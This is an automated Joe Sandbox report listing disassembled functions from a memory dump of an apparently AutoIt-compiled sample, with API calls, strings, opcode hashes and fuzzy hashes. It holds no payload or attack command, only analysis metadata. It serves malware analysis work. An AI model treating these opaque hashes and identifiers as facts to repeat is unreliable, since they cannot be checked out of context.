SendMessageW.USER32(?,00001105,00000000,00000000), ref: 000F7B76

Strings

', xrefs: 000F7ACA

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 49762326f05caebc72c7388f360da2e1a0d74b589aa5bf9d524944129f6b24ec
Instruction ID: e283e1d86e14fbe188ed5a94f2839748620ad7868e3ad1bdf2549c20df7a7df5
Opcode Fuzzy Hash: 49762326f05caebc72c7388f360da2e1a0d74b589aa5bf9d524944129f6b24ec
Instruction Fuzzy Hash: D5411774A0520A9FDB54CF65C880BEABBF5FF09300F11016AEA08AB741E771A941DF91

Function 000F6A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 000F6B17
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 000F6B53

Strings

static, xrefs: 000F6AB3

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: ca4736a60522b214755e61133ce6743ac876528b32590a247655012ccb5214e4
Instruction ID: dede62faed16583df5d5281e29cd5426fef7f6ea25686136fafa0ae0463a716b
Opcode Fuzzy Hash: ca4736a60522b214755e61133ce6743ac876528b32590a247655012ccb5214e4
Instruction Fuzzy Hash: A4318F71100608AEEB109F68CC41BFB77B9FF48760F108619FAA9D7591DB35AC81EB60

Function 000D28A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000D2911
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 000D294C

Strings

0, xrefs: 000D290A

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 575bacafe47bb039009071ac390c49bcbe29d41f813d4bdc5a9fc332850d91cf
Instruction ID: f8cfd78e3295ea042206aeac069c0515ec3fc0738528c55a4dfe25c0e2e3772e
Opcode Fuzzy Hash: 575bacafe47bb039009071ac390c49bcbe29d41f813d4bdc5a9fc332850d91cf
Instruction Fuzzy Hash: 8631CE31A00305AFEB64CF58C985BEEFBF9EF55350F14002AE995A62A1DB709980DB71

Function 000E39E9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 000E3A66

Part of subcall function 00077DE1: _memmove.LIBCMT ref: 00077E22

Strings

, $, xrefs: 000E3AA6
AUTOITCALLVARIABLE%d, xrefs: 000E3A58

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 3506404897-2584243854
Opcode ID: abfb8790ffb061e2a94e987ad4de0e5efb2f162086850d2096ee5ed5d4fe8a20
Instruction ID: 09f290fae1ec0134fcbb638d4bd74ec335831660b9aed8fd8456ce0c70710027
Opcode Fuzzy Hash: abfb8790ffb061e2a94e987ad4de0e5efb2f162086850d2096ee5ed5d4fe8a20
Instruction Fuzzy Hash: 4021A530A00119AFCF10EF65CC86EEE7BB5AF45340F448468F949B7182DB35EA91CB66

Function 000F66D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 000F6761
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 000F676C

Strings

Combobox, xrefs: 000F672E

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 9c5dd266f406cd26a15f6a965c12116baf8e264c97786bdc07d60a57469ecb0c
Instruction ID: 4bd5a2a3a078aba0539e9c5aad7fa012d8898f8e00eb9805647619dbb039366e
Opcode Fuzzy Hash: 9c5dd266f406cd26a15f6a965c12116baf8e264c97786bdc07d60a57469ecb0c
Instruction Fuzzy Hash: E111B67520420CAFEF61DF54CC80EFB37AAEB45368F104125FA1497691D6369C5197A0

Function 000F6C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00071D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00071D73
Part of subcall function 00071D35: GetStockObject.GDI32(00000011), ref: 00071D87
Part of subcall function 00071D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00071D91

GetWindowRect.USER32(00000000,?), ref: 000F6C71
GetSysColor.USER32(00000012), ref: 000F6C8B

Strings

static, xrefs: 000F6C4E

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: c640546f10367a4e5129fb36ef8e4332f3a704fce740d028d5cc8cf235e7a5b0
Instruction ID: 1820ebb78d4c0f37de68ad40cb91de7bccc313964fc81f80b2ce0f6c2ce43435
Opcode Fuzzy Hash: c640546f10367a4e5129fb36ef8e4332f3a704fce740d028d5cc8cf235e7a5b0
Instruction Fuzzy Hash: F121177251020AAFDB14DFB8CC45AFA7BA8FB08314F004629FA95D2651D635E850EB60

Function 000F6920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 000F69A2
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 000F69B1

Strings

edit, xrefs: 000F6986

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: f859851f107c67706e3c3d8734c8ecacea7d47ffb43570e325cd3e1b367e9062
Instruction ID: 416dd79e08218b8e09318345674b0d24add802f502179db068b1888a80c8a5d9
Opcode Fuzzy Hash: f859851f107c67706e3c3d8734c8ecacea7d47ffb43570e325cd3e1b367e9062
Instruction Fuzzy Hash: 90119D71104109ABEB508E64DC41AFB3BADEF05374F504724FAA5969E0C6B6DC50AB60

Function 000D29AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000D2A22
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 000D2A41

Strings

0, xrefs: 000D2A18

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 065ecf348b08ab5da20162ebfe70aa8a9ec289dcdcd51a735975129dc33ff340
Instruction ID: 0f151916c015ff2daa28bbcf569252c63faa810d38ae8ae4b89c56c1ddd8257a
Opcode Fuzzy Hash: 065ecf348b08ab5da20162ebfe70aa8a9ec289dcdcd51a735975129dc33ff340
Instruction Fuzzy Hash: D211DD32901324ABDB30DA9CD844BAEB7F9EB65700F044022E855E73A0D730AD0AD7A2

Function 000E21D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 000E222C
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 000E2255

Strings

<local>, xrefs: 000E221D

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 705da3bc1c0d9f9d9e3a5841aeed4f73ad5c0ecf28768299a2e71dfa1e8d24df
Instruction ID: 47b941999f55263f4f64f3bd0a5076e13f2582b23d1701702b7b767f0bf5a816
Opcode Fuzzy Hash: 705da3bc1c0d9f9d9e3a5841aeed4f73ad5c0ecf28768299a2e71dfa1e8d24df
Instruction Fuzzy Hash: 5F11A0706412A6FEEB258F528C88EBBFBACFF16751F10822EFA1566400D3715990D6F1

Function 000C8E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00077DE1: _memmove.LIBCMT ref: 00077E22

Part of subcall function 000CAA99: GetClassNameW.USER32(?,?,000000FF), ref: 000CAABC

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 000C8E73

Strings

ListBox, xrefs: 000C8E3D
ComboBox, xrefs: 000C8E12

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 15fc8e2cff394170765c3a33b3dc1895ca0c9603d0665cfa64461d8740b1ed41
Instruction ID: c9287651dc81ed258ba4d798cb68331137acc3c3c0ee2dd6bdf0a19846a0e1c6
Opcode Fuzzy Hash: 15fc8e2cff394170765c3a33b3dc1895ca0c9603d0665cfa64461d8740b1ed41
Instruction Fuzzy Hash: E101F571A01229ABCB14EBA4CC41DFE7368AF06360B104A1DB829572E2DF355808C754

Function 000C8CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00077DE1: _memmove.LIBCMT ref: 00077E22

Part of subcall function 000CAA99: GetClassNameW.USER32(?,?,000000FF), ref: 000CAABC

SendMessageW.USER32(?,00000180,00000000,?), ref: 000C8D6B

Strings

ListBox, xrefs: 000C8D35
ComboBox, xrefs: 000C8D0A

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 6bc8a271e9102242e5107cd7ca9f15c1dbc5736d6100ca6f26d5a6e4386da798
Instruction ID: 52727d13b464db04ef906822918c4e7cb04db909e016138bdf18fc1cf84e56b1
Opcode Fuzzy Hash: 6bc8a271e9102242e5107cd7ca9f15c1dbc5736d6100ca6f26d5a6e4386da798
Instruction Fuzzy Hash: 6E01DF71B41109ABDB24EBE0C952FFF73A89F15340F104429B90A672E2DE645E08D37A

Function 000C8D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00077DE1: _memmove.LIBCMT ref: 00077E22

Part of subcall function 000CAA99: GetClassNameW.USER32(?,?,000000FF), ref: 000CAABC

SendMessageW.USER32(?,00000182,?,00000000), ref: 000C8DEE

Strings

ListBox, xrefs: 000C8DBA
ComboBox, xrefs: 000C8D8F

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 02ef2eb26b2f0905ca85839282c38c957146d1ce7ca1da049a708177ea6d1266
Instruction ID: 674dbfe69bbdfdb8d66e04d8edcd3e0a9ecfd671d9657dbca3e30ca40abb927d
Opcode Fuzzy Hash: 02ef2eb26b2f0905ca85839282c38c957146d1ce7ca1da049a708177ea6d1266
Instruction Fuzzy Hash: 5F018F71A41109A7DB21EBE4C942FFF77A89F15340F108419B90AA72D2DE654E18D37A

Function 000D4F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 000D4F46
_wcscmp.LIBCMT ref: 000D4F58

Strings

#32770, xrefs: 000D4F52

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: a6b99929ce3f4336ae18a86fd6dd7222bc93f3da1a8aba8f42b3058cdcc13dd7
Instruction ID: f47e1a03ba94789848e111bb86fdeb1883115546d6a915e5613d0977cdbe10d4
Opcode Fuzzy Hash: a6b99929ce3f4336ae18a86fd6dd7222bc93f3da1a8aba8f42b3058cdcc13dd7
Instruction Fuzzy Hash: BEE092326043296BE720AB99AC49AA7F7ACEB45B61F010067FD04D2151DA609A558BE0

Function 000AB2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 000AB314: _memset.LIBCMT ref: 000AB321

Part of subcall function 00090940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,000AB2F0,?,?,?,0007100A), ref: 00090945

IsDebuggerPresent.KERNEL32(?,?,?,0007100A), ref: 000AB2F4
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0007100A), ref: 000AB303

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 000AB2FE

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: 34567ddc1d7cd2f3f4626a26e054c8d56483121d95c865476562e0edc0998d7f
Instruction ID: 16fcc7a00b4dac6a658a58c1c76ecd396ece503c552e76e2e2f6a7e3086b214b
Opcode Fuzzy Hash: 34567ddc1d7cd2f3f4626a26e054c8d56483121d95c865476562e0edc0998d7f
Instruction Fuzzy Hash: E3E06D712007118FEB60DF68E5043927AE4AF01714F008A3CE446C7652E7B8D544CBA1

Function 000C7C74 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 000C7C82

Part of subcall function 00093358: _doexit.LIBCMT ref: 00093362

Strings

Error allocating memory., xrefs: 000C7C7B
AutoIt, xrefs: 000C7C76

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: 9e0463b23fd643d2f5a4d6d9ad6671b71ee38489f76be9265321f8e7e62f5324
Instruction ID: a2256a8632ddd52dbccdb746c7c16256304821c81ab6475d95f335040bb6b245
Opcode Fuzzy Hash: 9e0463b23fd643d2f5a4d6d9ad6671b71ee38489f76be9265321f8e7e62f5324
Instruction Fuzzy Hash: 64D05B323C431C36E11532A96D47FDE75884F15B52F044425FB0C995D34ED58991A1E9

Function 000B1935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 000B1775

Part of subcall function 000EBFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,000B195E,?), ref: 000EBFFE
Part of subcall function 000EBFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 000EC010

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 000B196D

Strings

WIN_XPe, xrefs: 000B1788

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: WIN_XPe
API String ID: 582185067-3257408948
Opcode ID: f6a21198c5c5932efd7dd5837d2162ec07e38a045a766b463edb7c6954e86fa0
Instruction ID: 869ebc170b23fe27097a77a5240ba1dfb45107629bb3b7bb8421fdfcae96a081
Opcode Fuzzy Hash: f6a21198c5c5932efd7dd5837d2162ec07e38a045a766b463edb7c6954e86fa0
Instruction Fuzzy Hash: 40F0C970844109DFDB25DB91C9A8AFCBBF8BB08305FA40095E102A3591DB754F84DF64

Function 000F5964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 000F596E
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 000F5981

Part of subcall function 000D5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 000D52BC

Strings

Shell_TrayWnd, xrefs: 000F5967

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: fe4aac35e7593aa92548531fd1f630f85b84ba5b7448c9c5c8eb334aed35069f
Instruction ID: 2c263728e3a278985ea176475b71a2e64e4edbac11e027262dfd043a523272f7
Opcode Fuzzy Hash: fe4aac35e7593aa92548531fd1f630f85b84ba5b7448c9c5c8eb334aed35069f
Instruction Fuzzy Hash: A5D0C931384712B6E664AB70AC0BFF66A14AF10B51F000825B749AA6D1C9E49804C664

Function 000F5998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 000F59AE
PostMessageW.USER32(00000000), ref: 000F59B5

Part of subcall function 000D5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 000D52BC

Strings

Shell_TrayWnd, xrefs: 000F59A7

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 6e659a04aebc70e33ea8322a0a3eebcf6d74f206bafee99bfb3a4938906d50bc
Instruction ID: 35ccfc9be0fd5a22f8438e1864d1aa9ce3891ccb522b93fe1d02f2e4c856c60b
Opcode Fuzzy Hash: 6e659a04aebc70e33ea8322a0a3eebcf6d74f206bafee99bfb3a4938906d50bc
Instruction Fuzzy Hash: 91D0C9313817127AF664AB70AC0BFF66614AF15B51F000825B745EA6D1C9E4A804C664

